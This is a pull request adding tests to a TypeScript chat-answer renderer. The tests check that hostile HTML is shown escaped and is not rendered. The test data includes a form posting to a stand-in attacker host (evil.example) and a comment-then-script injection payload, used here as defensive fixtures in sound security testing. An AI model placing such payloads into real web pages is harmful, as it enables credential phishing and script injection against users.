### PR TITLE
test(chat): two hostile inputs carried across from a parallel implementation

### DIFF
--- a/src_vs_code/src/test/renderAnswer.test.ts
+++ b/src_vs_code/src/test/renderAnswer.test.ts
@@ -242,3 +242,19 @@ test('nothing empty is wrapped in a paragraph of its own', () => {
     assert.doesNotMatch(renderAnswer(markdown), /<p>\s*<\/p>/, `an empty paragraph came out of: ${markdown}`);
   }
 });
+
+test('a form, an input and a comment that tries to swallow the page are all just text', () => {
+  // Carried across from a parallel implementation of this plan (closed as a duplicate of the branch
+  // that shipped): its hostile file had two cases mine did not. A form posting somewhere is the one
+  // shape that could ask a person for something and send it away, and an HTML comment is the classic
+  // way to try to swallow the markup that follows it.
+  for (const attack of [
+    '<form action="https://evil.example"><input name="p"></form>',
+    '<!-- --><script>alert(1)</script>',
+  ]) {
+    const html = renderAnswer(`${attack}\n`);
+
+    assertOnlyAllowedTags(html, attack);
+    assert.match(html, /&lt;/, `this was silently dropped instead of shown: ${attack}`);
+  }
+});

--- a/src_vs_code/src/test/renderAnswer.test.ts
+++ b/src_vs_code/src/test/renderAnswer.test.ts
@@ -255,6 +255,30 @@ test('a form, an input and a comment that tries to swallow the page are all just
     const html = renderAnswer(`${attack}\n`);
 
     assertOnlyAllowedTags(html, attack);
-    assert.match(html, /&lt;/, `this was silently dropped instead of shown: ${attack}`);
+    // The WHOLE payload, escaped — not merely a `&lt;` somewhere in the output. A renderer that kept
+    // the first angle bracket and swallowed everything after it would have passed the weaker
+    // assertion this replaces, and swallowing is the other half of what must not happen here: a
+    // model quoting a `<script>` tag inside an explanation is giving an answer, and an answer with a
+    // hole in it is a defect of its own. (CodeRabbit, on the pull request.)
+    assert.ok(
+      html.includes(escaped(attack)),
+      `this was truncated rather than shown as text: ${attack}\ngot: ${html}`,
+    );
   }
 });
+
+/**
+ * The text of an attack as it must appear once it is shown rather than run.
+ *
+ * <p>Spelled out here rather than borrowed from the renderer's own escaper: a test that escapes with
+ * the function under test agrees with it by construction, including when both are wrong. These four
+ * replacements are the HTML text-node rule, and their ORDER is load-bearing — the ampersand first, or
+ * the ampersands this function itself introduces get escaped a second time.</p>
+ */
+function escaped(text: string): string {
+  return text
+    .replace(/&/g, '&amp;')
+    .replace(/</g, '&lt;')
+    .replace(/>/g, '&gt;')
+    .replace(/"/g, '&quot;');
+}


### PR DESCRIPTION
A second session built this plan's renderer at the same time; its PR (#169) was closed as a duplicate of the one that shipped (#168). Its hostile-input file had two cases mine did not, and they are the only thing worth carrying across:

- **a form and an input** — the one shape that could ask a person for something and send it away;
- **an HTML comment used to swallow the markup after it**.

Both pass against the shipped renderer, and both have teeth: with raw HTML passed through instead of escaped they go red with `<form> reached the page` and `<script> reached the page`.

Worth recording, because it is the interesting part: **the same plan went through two gates and they reached different answers.** Mine recommended `marked` and the round agreed; theirs was pushed by a security finding toward tokenise-and-escape-per-context with no dependency — also safe, and it rendered a markdown table as its pipes, because anything outside its bounded construct set came out as literal text. Both defensible; only one renders a table.

The two implementations also landed independently on the same assertion technique: collect every emitted tag and check it against an allow-list, rather than grepping the output for scary substrings.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Bug Fixes**
  * Improved rendering safeguards so hostile HTML input, including forms and scripts, is displayed as text rather than executed or rendered as markup.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->